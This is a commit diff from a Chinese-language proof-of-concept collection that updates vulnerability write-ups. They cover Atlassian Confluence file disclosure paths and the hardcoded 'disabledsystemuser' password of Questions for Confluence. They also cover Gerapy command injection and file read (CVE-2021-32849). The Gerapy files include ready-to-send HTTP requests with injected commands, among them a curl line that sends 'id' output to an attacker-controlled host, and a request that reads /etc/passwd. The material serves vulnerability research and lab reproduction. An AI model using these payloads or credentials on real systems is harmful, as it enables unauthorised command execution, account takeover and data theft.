admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 02:37:58 +00:00
Code Issues Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
Threekiii 2025-05-19 14:57:16 +08:00
parent 855c42efb1
commit ecfe267f9c
27 changed files with 407 additions and 273 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
README.md
View File

@ -322,9 +322,8 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* FFmpeg 任意文件读取漏洞SSRF漏洞 CVE-2016-1897+CVE-2016-1898
* Fhem FileLog_logWrapper 任意文件读取漏洞 CVE-2020-19360
* Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417
* Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849
* Gerapy parse 后台远程命令执行漏洞
* Gerapy read 后台任意文件读取漏洞
* Gerapy project_clone & project_parse 后台远程命令执行漏洞 CVE-2021-32849
* Gerapy project_file_read 后台任意文件读取漏洞
* GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-16509
* GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-19475
* GhostScript 沙箱绕过(命令执行)漏洞 CVE-2019-6116
@ -764,6 +763,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* Langflow code API 未授权远程代码执行漏洞 CVE-2025-3248
* Ollama 文件存在性泄露漏洞 CVE-2024-39719
* Ollama 文件存在性泄露漏洞 CVE-2024-39722
* Ollama 未授权访问漏洞 CNVD-2025-04094
* Ollama 目录遍历致代码执行漏洞 CVE-2024-37032
- 其他漏洞
@ -906,6 +906,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* Apache Druid 远程代码执行漏洞 QVD-2023-9629
* Apache HugeGraph JWT Token 密钥硬编码漏洞 CVE-2024-43441
* Apache HugeGraph 远程代码执行漏洞 CVE-2024-27348
* Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780
* ClickHouse API 数据库接口未授权访问漏洞
* ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427
* Elasticsearch 未授权访问

70
Web应用漏洞/Atlassian Confluence 敏感信息泄露 CVE-2021-26085.md
View File

@ -1,35 +1,35 @@
# Atlassian Confluence 敏感信息泄露 CVE-2021-26085
## 漏洞描述
Confluence 是一个专业的企业知识管理与协同软件,也可以用于构建企业 wiki。使用简单但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论信息推送。该漏洞不是任意文件读取只能读取一些 confluence 的配置文件,影响有限。
参考链接:
- https://jira.atlassian.com/browse/CONFSERVER-67893
## 漏洞影响
```
version < 7.4.10
7.5.0 ≤ version < 7.12.3
```
## 网络测绘
```
app="ATLASSIAN-Confluence"
```
## 漏洞复现
poc
```
/s/123cfx/_/;/WEB-INF/web.xml
/s/123cfx/_/;/WEB-INF/decorators.xml
/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
```
# Atlassian Confluence 敏感信息泄露 CVE-2021-26085
## 漏洞描述
Confluence 是一个专业的企业知识管理与协同软件,也可以用于构建企业 wiki。使用简单但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论信息推送。该漏洞不是任意文件读取只能读取一些 confluence 的配置文件,影响有限。
参考链接:
- https://jira.atlassian.com/browse/CONFSERVER-67893
## 漏洞影响
```
version < 7.4.10
7.5.0 ≤ version < 7.12.3
```
## 网络测绘
```
app="ATLASSIAN-Confluence"
```
## 漏洞复现
poc
```
/s/123cfx/_/;/WEB-INF/web.xml
/s/123cfx/_/;/WEB-INF/decorators.xml
/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
```

100
Web应用漏洞/Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138.md
View File

@ -1,51 +1,51 @@
# Atlassian Questions For Confluence 身份认证绕过漏洞CVE-2022-26138
## 漏洞描述
Atlassian官方发布了2022年7月的安全更新其中涉及到Confluence Server的多个漏洞其中CVE-2022-26138为一个硬编码漏洞。
当Confluence Server或Data Center上的Questions for Confluence app启用时它会创建一个名为`disabledsystemuser`的Confluence用户帐户。此帐户旨在帮助将数据从应用程序迁移到 Confluence Cloud的管理员账号中。该帐户通过使用**硬编码密码**创建并添加到confluence-users组中在默认情况下允许查看和编辑 Confluence 中的所有非受限页面。
未经身份验证攻击者可以利用所知的硬编码密码登录Confluence并访问该组有权限访问的所有页面。
## 漏洞影响
```
Questions for Confluence app == 2.7.34
Questions for Confluence app == 2.7.35
Questions for Confluence app == 3.0.2
```
## 漏洞分析
下载应用程序 **confluence-questions-3.0.2.jar** 或者另外两个版本。
```
https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar
```
分析源码在配置文件default.properties中可以找到所创建用户的相关信息其中的username和password都是固定的。
使用Java Decompiler打开jar文件在配置文件default.properties中可以找到所创建用户的相关信息。
![image-20230228165102312](images/image-20230228165102312.png)
上传Questions for Confluence应用程序使用硬编码用户密码成功登录。
```
predefined.user.username=disabledsystemuser
predefined.user.password=disabled1system1user6708
```
## 修复建议
目前厂商已发布升级更新Questions for Confluence扩展至以下安全版本:
- 2.7.x >= 2.7.38 (Confluence 6.13.18 到 7.16.2)
- Versions >= 3.0.5 (Confluence 7.16.3 之后的版本)
```
https://jira.atlassian.com/browse/CONFSERVER-79483
# Atlassian Questions For Confluence 身份认证绕过漏洞CVE-2022-26138
## 漏洞描述
Atlassian官方发布了2022年7月的安全更新其中涉及到Confluence Server的多个漏洞其中CVE-2022-26138为一个硬编码漏洞。
当Confluence Server或Data Center上的Questions for Confluence app启用时它会创建一个名为`disabledsystemuser`的Confluence用户帐户。此帐户旨在帮助将数据从应用程序迁移到 Confluence Cloud的管理员账号中。该帐户通过使用**硬编码密码**创建并添加到confluence-users组中在默认情况下允许查看和编辑 Confluence 中的所有非受限页面。
未经身份验证攻击者可以利用所知的硬编码密码登录Confluence并访问该组有权限访问的所有页面。
## 漏洞影响
```
Questions for Confluence app == 2.7.34
Questions for Confluence app == 2.7.35
Questions for Confluence app == 3.0.2
```
## 漏洞分析
下载应用程序 **confluence-questions-3.0.2.jar** 或者另外两个版本。
```
https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar
```
分析源码在配置文件default.properties中可以找到所创建用户的相关信息其中的username和password都是固定的。
使用Java Decompiler打开jar文件在配置文件default.properties中可以找到所创建用户的相关信息。
![image-20230228165102312](images/image-20230228165102312.png)
上传Questions for Confluence应用程序使用硬编码用户密码成功登录。
```
predefined.user.username=disabledsystemuser
predefined.user.password=disabled1system1user6708
```
## 修复建议
目前厂商已发布升级更新Questions for Confluence扩展至以下安全版本:
- 2.7.x >= 2.7.38 (Confluence 6.13.18 到 7.16.2)
- Versions >= 3.0.5 (Confluence 7.16.3 之后的版本)
```
https://jira.atlassian.com/browse/CONFSERVER-79483
```

70
Web应用漏洞/Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849.md
View File

@ -1,70 +0,0 @@
# Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849
## 漏洞描述
近日我司应急团队监测到关于Gerapy 0.9.6和之前的版本中存在注入漏洞漏洞编号CVE-2021-32849该漏洞源于程序没有正确清理通过project_clone端点传递给Popen的输入攻击者可利用该漏洞执行任意命令。
## 漏洞影响
```
Gerapy <= 0.9.6
```
## 网络测绘
```
title="Gerapy"
```
## 漏洞复现
登录页面
![image-20220524145040847](images/202205241450895.png)
出现漏洞的文件为 `gerapy/server/core/views.py`
![](images/202205241450608.png)
```
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def project_clone(request):
"""
clone project from github
:param request: request object
:return: json
"""
if request.method == 'POST':
data = json.loads(request.body)
address = data.get('address')
if not address.startswith('http'):
return JsonResponse({'status': False})
address = address + '.git' if not address.endswith('.git') else address
cmd = 'git clone {address} {target}'.format(address=address, target=join(PROJECTS_FOLDER, Path(address).stem))
logger.debug('clone cmd %s', mcd)
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
stdout, stderr = bytes2str(p.stdout.read()), bytes2str(p.stderr.read())
logger.debug('clone run result %s', stdout)
if stderr: logger.error(stderr)
return JsonResponse({'status': True}) if not stderr else JsonResponse({'status': False})
```
这里可以看到 address参数 为可控参数,拼接到 cmd中使用 Popen命令执行构造请求包
```
POST /api/project/clone HTTP/1.1
Host:
Content-Length: 61
Accept: application/json, text/plain, */*
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
{"address":"http://127.0.0.1;curl xxx.xxx.xxx.xxx:9999?`id`"}
```
![](images/202205241451576.png)

46
Web应用漏洞/Gerapy parse 后台远程命令执行漏洞.md
View File

@ -1,46 +0,0 @@
# Gerapy parse 后台远程命令执行漏洞
## 漏洞描述
Gerapy gerapy/server/core/views.py 中的方法存在任意命令执行,攻击者登录后台后发送特定的请求包即可利用漏洞
## 漏洞影响
```
Gerapy <= 0.9.7
```
## 网络测绘
```
title="Gerapy"
```
## 漏洞复现
登录页面
![image-20220524145144051](images/202205241451094.png)
出现漏洞的文件为 `gerapy/server/core/views.py`
![](images/202205241451220.png)
构造请求包测试命令执行
```
POST /api/project/1/parse HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/plain, */*
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Length: 18
{"spider":";`id`"}
```
![](images/202205241452592.png)

199
Web应用漏洞/Gerapy project_clone & project_parse 后台远程命令执行漏洞 CVE-2021-32849.md Normal file
View File

@ -0,0 +1,199 @@
# Gerapy project_clone & project_parse 后台远程命令执行漏洞 CVE-2021-32849
## 漏洞描述
Gerapy 是一款基于 Scrapy、Scrapyd、Django 和 Vue.js 的分布式爬虫管理框架。
Gerapy < 0.9.9 存在远程命令执行漏洞函数 `project_clone`  `project_parse` 在处理数据时容易受到命令注入攻击经过身份验证的攻击者可以在系统上执行任意命令
参考链接:
- https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/
- https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j
- https://github.com/Gerapy/Gerapy/issues/197
- https://github.com/Gerapy/Gerapy/issues/217
## 漏洞影响
```
Gerapy < 0.9.9
```
## 网络测绘
```
title="Gerapy"
```
## 环境搭建
docker-compose.yml
```
version: "3.9"
services:
gerapy:
image: germey/gerapy:0.9.6
build: .
container_name: gerapy
restart: always
volumes:
- gerapy:/home/gerapy
ports:
- 8000:8000
volumes:
gerapy:
```
执行如下命令启动一个 Gerapy 0.9.6 版本的服务器:
```
docker-compose up -d
```
启动完成后,访问 `http://your-ip:8000` 即可查看登录页面,通过默认口令 `admin/admin` 登录后台。
![](images/Gerapy%20project_clone%20&%20project_parse%20后台远程命令执行漏洞%20CVE-2021-32849/image-20250516163736075.png)
## 漏洞复现
### 问题 1`project_clone`
[漏洞点](https://github.com/Gerapy/Gerapy/blob/af5657354aa040d5a6b52c91a837f5d63422d6d3/gerapy/server/core/views.py#L339) 位于 `gerapy/server/core/views.py`
```
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def project_clone(request):
"""
clone project from github
:param request: request object
:return: json
"""
if request.method == 'POST':
data = json.loads(request.body)
# NOTE(1): Address comes from the post's body.
address = data.get('address')
if not address.startswith('http'):
return JsonResponse({'status': False})
address = address + '.git' if not address.endswith('.git') else address
# NOTE(2): Address is used to build a command without sanitization.
cmd = 'git clone {address} {target}'.format(address=address, target=join(PROJECTS_FOLDER, Path(address).stem))
logger.debug('clone cmd %s', cmd)
# NOTE(3): Command is executed.
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
stdout, stderr = bytes2str(p.stdout.read()), bytes2str(p.stderr.read())
logger.debug('clone run result %s', stdout)
if stderr: logger.error(stderr)
return JsonResponse({'status': True}) if not stderr else JsonResponse({'status': False})
```
![](images/Gerapy%20project_clone%20&%20project_parse%20后台远程命令执行漏洞%20CVE-2021-32849/image-20250516164053148.png)
`address` 为可控参数,构造请求包:
```
POST /api/project/clone HTTP/1.1
Host: your-ip:8000
Accept: */*
Referer: http://your-ip:8000/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Authorization: Token e8279162677dd4fbfefe352b0f51ea8ad19cace5
{"address":"http://127.0.0.1;curl your-vps-ip:9999?`id`"}
```
成功执行:
![](images/Gerapy%20project_clone%20&%20project_parse%20后台远程命令执行漏洞%20CVE-2021-32849/image-20250516165019665.png)
### 问题 2`project_parse`
[漏洞点](https://github.com/Gerapy/Gerapy/blob/af5657354aa040d5a6b52c91a837f5d63422d6d3/gerapy/server/core/views.py#L539) 位于 `gerapy/server/core/views.py`
```
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def project_parse(request, project_name):
"""
parse project
:param request: request object
:param project_name: project name
:return: requests, items, response
"""
if request.method == 'POST':
project_path = join(PROJECTS_FOLDER, project_name)
# NOTE(1)
data = json.loads(request.body)
logger.debug('post data %s', data)
spider_name = data.get('spider')
args = {
'start': data.get('start', False),
'method': data.get('method', 'GET'),
'url': data.get('url'),
'callback': data.get('callback'),
'cookies': "'" + json.dumps(data.get('cookies', {}), ensure_ascii=False) + "'",
'headers': "'" + json.dumps(data.get('headers', {}), ensure_ascii=False) + "'",
'meta': "'" + json.dumps(data.get('meta', {}), ensure_ascii=False) + "'",
'dont_filter': data.get('dont_filter', False),
'priority': data.get('priority', 0),
}
# set request body
body = data.get('body', '')
if args.get('method').lower() != 'get':
args['body'] = "'" + json.dumps(body, ensure_ascii=False) + "'"
# NOTE(2)
args_cmd = ' '.join(
['--{arg} {value}'.format(arg=arg, value=value) for arg, value in args.items()])
logger.debug('args cmd %s', args_cmd)
cmd = 'gerapy parse {args_cmd} {project_path} {spider_name}'.format(
args_cmd=args_cmd,
project_path=project_path,
spider_name=spider_name
)
logger.debug('parse cmd %s', cmd)
# NOTE(3)
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)
stdout, stderr = bytes2str(p.stdout.read()), bytes2str(p.stderr.read())
logger.debug('stdout %s, stderr %s', stdout, stderr)
if not stderr:
return JsonResponse({'status': True, 'result': json.loads(stdout)})
else:
return JsonResponse({'status': False, 'message': stderr})
```
![](images/Gerapy%20project_clone%20&%20project_parse%20后台远程命令执行漏洞%20CVE-2021-32849/image-20250516165224445.png)
构造请求包:
```
POST /api/project/1/parse HTTP/1.1
Host: your-ip:8000
Accept: */*
Referer: http://your-ip:8000/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Authorization: Token e8279162677dd4fbfefe352b0f51ea8ad19cace5
{"spider":"`id`"}
```
![](images/Gerapy%20project_clone%20&%20project_parse%20后台远程命令执行漏洞%20CVE-2021-32849/image-20250516165506340.png)
## 漏洞修复
升级至安全版本。

102
Web应用漏洞/Gerapy project_file_read 后台任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,102 @@
# Gerapy project_file_read 后台任意文件读取漏洞
## 漏洞描述
Gerapy 是一款基于 Scrapy、Scrapyd、Django 和 Vue.js 的分布式爬虫管理框架。
Gerapy < 0.9.9 存在任意文件读取漏洞函数 `project_file_read`  `path` `label` 参数可控经过身份验证的攻击者可以读取任意文件
参考链接:
- https://github.com/Gerapy/Gerapy/issues/210
- https://github.com/Gerapy/Gerapy/blob/af5657354aa040d5a6b52c91a837f5d63422d6d3/gerapy/server/core/views.py#L548-L561
## 漏洞影响
```
Gerapy < 0.9.9
```
## 网络测绘
```
title="Gerapy"
```
## 环境搭建
docker-compose.yml
```
version: "3.9"
services:
gerapy:
image: germey/gerapy:0.9.6
build: .
container_name: gerapy
restart: always
volumes:
- gerapy:/home/gerapy
ports:
- 8000:8000
volumes:
gerapy:
```
执行如下命令启动一个 Gerapy 0.9.6 版本的服务器:
```
docker-compose up -d
```
启动完成后,访问 `http://your-ip:8000` 即可查看登录页面,通过默认口令 `admin/admin` 登录后台。
![](Public/Awesome-POC/Web应用漏洞/images/Gerapy%20project_file_read%20后台任意文件读取漏洞/image-20250516170319239.png)
## 漏洞复现
[漏洞点](https://github.com/Gerapy/Gerapy/blob/af5657354aa040d5a6b52c91a837f5d63422d6d3/gerapy/server/core/views.py#L339) 位于 `gerapy/server/core/views.py`
```
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def project_file_read(request):
"""
get content of project file
:param request: request object
:return: file content
"""
if request.method == 'POST':
data = json.loads(request.body)
path = join(data['path'], data['label'])
# binary file
with open(path, 'rb') as f:
return HttpResponse(f.read().decode('utf-8'))
```
![](Public/Awesome-POC/Web应用漏洞/images/Gerapy%20project_file_read%20后台任意文件读取漏洞/image-20250516170104352.png)
构造请求包:
```
POST /api/project/file/read HTTP/1.1
Host: your-ip:8000
Accept: */*
Referer: http://your-ip:8000/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Authorization: Token e8279162677dd4fbfefe352b0f51ea8ad19cace5
{"path":"/etc/","label":"passwd"}
```
![](Public/Awesome-POC/Web应用漏洞/images/Gerapy%20project_file_read%20后台任意文件读取漏洞/image-20250516170502226.png)
## 漏洞修复
升级至安全版本。

68
Web应用漏洞/Gerapy read 后台任意文件读取漏洞.md
View File

@ -1,68 +0,0 @@
# Gerapy read 后台任意文件读取漏洞
## 漏洞描述
Gerapy gerapy/server/core/views.py 中的 project_file_read 方法存在任意文件读取,攻击者登录后台后发送特定的请求包即可利用漏洞
## 漏洞影响
```
Gerapy <= 0.9.6
```
## 网络测绘
```
title="Gerapy"
```
## 漏洞复现
登录页面
![image-20220524145252413](images/202205241452469.png)
出现漏洞的文件为 `gerapy/server/core/views.py`
![](images/202205241453657.png)
```
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def project_file_read(request):
"""
get content of project file
:param request: request object
:return: file content
"""
if request.method == 'POST':
data = json.loads(request.body)
path = join(data['path'], data['label'])
# binary file
with open(path, 'rb') as f:
return HttpResponse(f.read().decode('utf-8'))
```
参数 path 和 label 都为用户可控变量,登录后构造请求包
```
POST /api/project/file/read HTTP/1.1
Host:
Content-Length: 35
Accept: application/json, text/plain, */*
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
{"path":"/etc/",
"label":"passwd"}
```
![](images/202205241453910.png)

BIN
Web应用漏洞/images/202205241450608.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 1.0 MiB

BIN
Web应用漏洞/images/202205241450895.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 35 KiB

BIN
Web应用漏洞/images/202205241451094.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 35 KiB

BIN
Web应用漏洞/images/202205241451220.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 491 KiB

BIN
Web应用漏洞/images/202205241451576.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 649 KiB

BIN
Web应用漏洞/images/202205241452469.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 34 KiB

BIN
Web应用漏洞/images/202205241452592.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 132 KiB

BIN
Web应用漏洞/images/202205241453657.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 1.1 MiB

BIN
Web应用漏洞/images/202205241453910.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 393 KiB

BIN
Web应用漏洞/images/Gerapy project_clone & project_parse 后台远程命令执行漏洞 CVE-2021-32849/image-20250516163736075.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 136 KiB

BIN
Web应用漏洞/images/Gerapy project_clone & project_parse 后台远程命令执行漏洞 CVE-2021-32849/image-20250516164053148.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 420 KiB

BIN
Web应用漏洞/images/Gerapy project_clone & project_parse 后台远程命令执行漏洞 CVE-2021-32849/image-20250516165019665.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 302 KiB

BIN
Web应用漏洞/images/Gerapy project_clone & project_parse 后台远程命令执行漏洞 CVE-2021-32849/image-20250516165224445.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 395 KiB

BIN
Web应用漏洞/images/Gerapy project_clone & project_parse 后台远程命令执行漏洞 CVE-2021-32849/image-20250516165506340.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 249 KiB

BIN
Web应用漏洞/images/Gerapy project_file_read 后台任意文件读取漏洞/image-20250516170104352.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 370 KiB

BIN
Web应用漏洞/images/Gerapy project_file_read 后台任意文件读取漏洞/image-20250516170319239.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 115 KiB

BIN
Web应用漏洞/images/Gerapy project_file_read 后台任意文件读取漏洞/image-20250516170502226.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 493 KiB

16
base/gerapy/0.9.6/docker-compose.yml Normal file
View File

@ -0,0 +1,16 @@
version: "3.9"
services:
gerapy:
image: germey/gerapy:0.9.6
build: .
container_name: gerapy
restart: always
volumes:
- gerapy:/home/gerapy
ports:
- 8000:8000
volumes:
gerapy:

2
开发框架漏洞/Spring Cloud Function SpEL表达式命令注入 CVE-2022-22963.md
View File

@ -26,7 +26,7 @@ docker-compose up -d
```
POST /functionRouter HTTP/1.1
Host: y:8080
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en